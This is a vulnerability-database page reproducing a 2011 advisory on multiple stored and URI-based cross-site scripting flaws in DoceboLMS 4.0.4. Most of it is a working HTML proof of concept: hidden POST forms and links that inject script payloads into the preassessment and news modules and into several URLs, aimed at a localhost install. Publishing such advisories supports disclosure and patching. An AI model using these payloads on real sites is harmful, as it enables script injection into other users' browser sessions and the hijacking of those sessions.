Lucene search

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities

🗓️ 03 Apr 2011 00:00:00Reported by Gjoko KrsticType

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities in SCORM e-Learning Platform

<!--

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities


Vendor: Docebo
Product web page: http://www.docebo.org
Affected version: 4.0.4 CE

Summary: DoceboLMS is a SCORM compliant Open Source e-Learning
platform used in corporate, government and education markets.

Desc: DoceboLMS suffers from multiple stored XSS vulnerabilities
pre and post auth. Input thru the POST parameters 'name', 'code'
and 'title' in index.php is not sanitized allowing the attacker
to execute HTML code into user's browser session on the affected
site. URI based XSS vulnerabilities are also present.

Tested on: Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5006
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php


02.04.2011

--><html>
<head><title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
</head><body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br/><br/>
<form action="http://localhost/DoceboLMS_404/doceboCore/index.php?modname=preassessment&amp;op=modassessment" enctype="application/x-www-form-urlencoded" id="xss1" method="POST">
<input name="authentic_request" type="hidden" value="23dfee506a748201730ab2bb7486e77a"/>
<input name="code" type="hidden" value='"&gt;&lt;script&gt;alert(1)&lt;/script&gt;'/>
<input name="description" type="hidden" value="ZSL"/>
<input name="id_assess" type="hidden" value="0"/>
<input name="name" type="hidden" value='"&gt;&lt;script&gt;alert(2)&lt;/script&gt;'/>
<input name="save" type="hidden" value="Save changes"/></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit PreAssessment Module!</h3></center></a><br/><br/>
<form action="http://localhost/DoceboLMS_404/doceboCore/index.php?modname=news&amp;op=savenews" enctype="application/x-www-form-urlencoded" id="xss2" method="POST">
<input name="authentic_request" type="hidden" value="23dfee506a748201730ab2bb7486e77a"/>
<input name="language" type="hidden" value="2"/>
<input name="long_desc" type="hidden" value=""/>
<input name="news" type="hidden" value="Insert"/>
<input name="short_desc" type="hidden" value="ZSL"/>
<input name="title" type="hidden" value='"&gt;&lt;script&gt;alert(1)&lt;/script&gt;'/></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit News Module!</h3></center></a><br/><br/>
<a href="http://localhost/DoceboLMS_404/index.php?&lt;script&gt;alert(1)&lt;/script&gt;" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit URI XSS #1</h3></center></a><br/><br/>
<a href="http://localhost/DoceboLMS_404/?&lt;script&gt;alert(1)&lt;/script&gt;" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit URI XSS #2</h3></center></a><br/><br/>
<a href="http://localhost/DoceboLMS_404/docebolms/index.php/index.php?&lt;script&gt;alert(1)&lt;/script&gt;" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit URI XSS #3</h3></center></a><br/><br/>
<a href="http://localhost/DoceboLMS_404/docebolms/?&lt;script&gt;alert(1)&lt;/script&gt;" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>Exploit URI XSS #4</h3></center></a><br/><br/>
</body></html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

03 Apr 2011 00:00Current

6Medium risk

Vulners AI Score6